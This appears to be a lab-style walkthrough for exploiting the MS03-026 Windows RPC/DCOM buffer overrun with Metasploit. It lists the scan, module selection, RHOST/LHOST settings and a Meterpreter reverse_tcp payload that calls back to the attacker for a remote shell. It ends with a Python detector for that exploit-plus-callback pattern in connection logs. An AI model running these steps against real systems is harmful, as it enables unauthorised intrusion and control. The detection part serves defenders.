Steps to Exploit the vulnerability
1. Find the IP address of the machine
If you have login access to the machine, the “ipconfig” command shows its IP address. If you don’t, you can find it with an IP range scan, provided the machine is on the same network.
2. Scan the ports with Nmap
Syntax: nmap <IP address>
3. Search for vulnerabilities and exploits
By searching Google or running a vulnerability scanner, we can find vulnerabilities in the discovered services and the exploits that target them.
I was able to find this vulnerability in the “msrpc” service, which is running on port 135, by searching Google.
Vulnerability: Buffer Overrun in RPC Interface Could Allow Code Execution
Microsoft Security Bulletin: MS03-026
CVE ID: CVE-2003-0352
Affected software:
· Microsoft Windows NT® 4.0
· Microsoft Windows NT 4.0 Terminal Services Edition
· Microsoft Windows 2000
· Microsoft Windows XP
· Microsoft Windows Server™ 2003
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The flaw results from incorrect handling of malformed messages.
This particular vulnerability affects a Distributed Component Object Model (DCOM) interface within RPC, which listens on RPC-enabled ports. This interface handles DCOM object activation requests that client machines send to the server.
An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system, including installing programs, viewing, changing, or deleting data, or creating new accounts with full privileges.
To exploit this vulnerability, an attacker would need to send a specially formed request to the remote computer on specific RPC ports.
4. Find the Metasploit exploit
First, open Metasploit.
Then look up the exploit with the search feature.
You will get this exploit: exploit/windows/dcerpc/ms03_026_dcom
5. Set up the exploit
Select the exploit with the “use” command.
Syntax: use <exploit name>
Then type “show options” to see which settings the exploit requires.
Now set RHOST to the IP address of the Windows 2000 machine.
Syntax: set RHOST <remote ip>
You don’t need to change RPORT; use the default port (135).
6. Set the payload
We don’t need to set a payload manually, because Metasploit selects one automatically. We can still set one explicitly.
In here, I will use “windows/meterpreter/reverse_tcp” (this is the default payload).
Syntax: set PAYLOAD <payload name>
Set your local IP address as LHOST. The “ifconfig” command shows your IP.
Then set a local port (LPORT). The default is port 4444.
Once everything is set, launch the exploit with the “run” or “exploit” command.
Within seconds, a Meterpreter session opens. Type “sysinfo” to get information about the system, “shell” to open a Windows shell, and “help” to list all the commands you can run.
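From the defender’s side, the sequence above leaves a recognisable trace in connection logs: an inbound TCP connection to the RPC endpoint mapper on port 135, followed shortly by an outbound connection from that same host back to the same peer on the reverse-shell port (4444 by default). The following Python is an added example, not part of the original write-up or of Metasploit; the log format, the hosts and the 60-second window are constructed assumptions.

```python
# Constructed sample in a simplified Zeek conn.log style (assumption):
# timestamp src_ip src_port dst_ip dst_port proto
SAMPLE_LOG = """\
1.0 10.0.0.5 49152 10.0.0.20 135 tcp
1.5 10.0.0.20 1045 10.0.0.5 4444 tcp
3.0 10.0.0.7 50000 10.0.0.20 445 tcp
9.0 10.0.0.9 51000 10.0.0.21 135 tcp
"""

RPC_EPMAP_PORT = 135          # DCOM/RPC endpoint mapper targeted by MS03-026
REVERSE_SHELL_PORTS = {4444}  # Metasploit's default LPORT, as used in the write-up
WINDOW_SECONDS = 60.0         # assumed correlation window (constructed)


def parse_conn_log(text):
    """Parse whitespace-separated connection records into dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, _sport, dst, dport, proto = line.split()
        rows.append({"ts": float(ts), "src": src, "dst": dst,
                     "dport": int(dport), "proto": proto})
    return rows


def find_rpc_reverse_shell(rows, window=WINDOW_SECONDS):
    """Return (victim, attacker, t_in, t_out) for every inbound TCP/135
    connection that is followed within `window` seconds by an outbound TCP
    connection from the same host back to the same peer on a reverse-shell
    port. A lone connection to 135 (e.g. a port scan) is not reported."""
    hits = []
    inbound = [r for r in rows
               if r["proto"] == "tcp" and r["dport"] == RPC_EPMAP_PORT]
    for r in inbound:
        for o in rows:
            if (o["proto"] == "tcp" and o["src"] == r["dst"]
                    and o["dst"] == r["src"]
                    and o["dport"] in REVERSE_SHELL_PORTS
                    and 0 <= o["ts"] - r["ts"] <= window):
                hits.append((r["dst"], r["src"], r["ts"], o["ts"]))
    return hits


if __name__ == "__main__":
    for victim, attacker, t_in, t_out in find_rpc_reverse_shell(parse_conn_log(SAMPLE_LOG)):
        print(f"possible RPC exploit + reverse shell: {attacker} -> {victim}:135 "
              f"at {t_in}, callback to {attacker} at {t_out}")
```

The scan-only record for 10.0.0.21 is not flagged, which is the point of correlating the two connections rather than alerting on every touch of port 135.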